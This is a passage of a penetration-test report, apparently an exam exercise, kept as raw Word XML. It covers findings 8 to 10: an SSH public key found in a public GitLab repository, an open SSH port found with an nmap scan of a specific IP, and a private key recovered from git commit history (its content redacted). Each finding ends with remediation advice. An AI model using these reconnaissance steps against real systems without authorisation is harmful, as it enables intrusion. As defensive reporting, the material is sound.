        <w:rPr/>
        <w:br/>
        <w:t xml:space="preserve">Through passive reconnaissance and internal leak analysis (via Base64 logs), a GitLab repository was discovered belonging to the database/system user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>softuniblogadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. The repository contains a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, representing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>public part of an SSH key pair</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, historically deployed to the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This directly aligns with the exam’s main objective – identifying a stored SSH key accessible online.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1274" w:right="567" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Repository: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>https://gitlab.com/softuniblogadmin/mybackup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1274" w:right="567" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1274" w:right="567" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Key type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ssh-rsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1274" w:right="567" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence: Full base64-encoded key present in plaintext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>How it was found:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>softuniblogadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> identified via internal PostgreSQL credentials from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Queried GitLab for this username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Located project </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>mybackup</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> containing the SSH public key and README.md with compromise context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>While this is the public key, it confirms previous use of this key pair in production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If private key (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) had leaked elsewhere (e.g., backup, file dump), access to the system would be possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Establishes prior compromise and mismanagement of secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recommended Action:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rotate all SSH credentials on the affected systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove sensitive files from public version control platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and pre-commit hooks to avoid future leaks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="707" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="102">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6624320" cy="284607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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6624320" cy="2846070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>creenshot Proof:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability 9: Open SSH Port (22/tcp) with Historical Key Deployment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Risk: High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t xml:space="preserve">The target exposes an active SSH service on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>22/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>OpenSSH 8.2p1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> on Ubuntu. This version is not the latest, and more importantly, previous analysis (via GitLab and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> logs) confirms that an SSH key pair (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) was historically deployed to the server. Although the private key was not found, this poses an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>ongoing risk</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> if:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The private key still exists somewhere (e.g. old backups),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No proper key rotation has been performed,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Server trust relationships remain based on that key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>How I found it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Performed full TCP scan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>nmap -sS -sV -T4 -p- 185.218.124.165</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Detected SSH running on port 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Correlated with prior findings from GitLab (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> found in public repo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Possible brute-force or credential reuse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Possibility of pivoting if key reuse occurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Server may still trust old known hosts or keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Perform full SSH key audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rotate all SSH host and user keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Implement fail2ban and key-based login restrictions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Monitor access logs for unusual login behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="103">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6624320" cy="264223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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6624320" cy="2642235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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Normal"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 10: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exposed Private SSH Key in Git History</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t xml:space="preserve">During repository forensics of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>https://gitlab.com/softuniblogadmin/mybackup</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, I examined the commit history and located a deleted file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> within commit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>8970beca</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. This file contains a full private SSH key in plaintext, clearly visible with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>vbnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>-----BEGIN OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>[... key content ...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>-----END OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>How I found it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Passive reconnaissance led to GitLab repo via leaked PostgreSQL username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
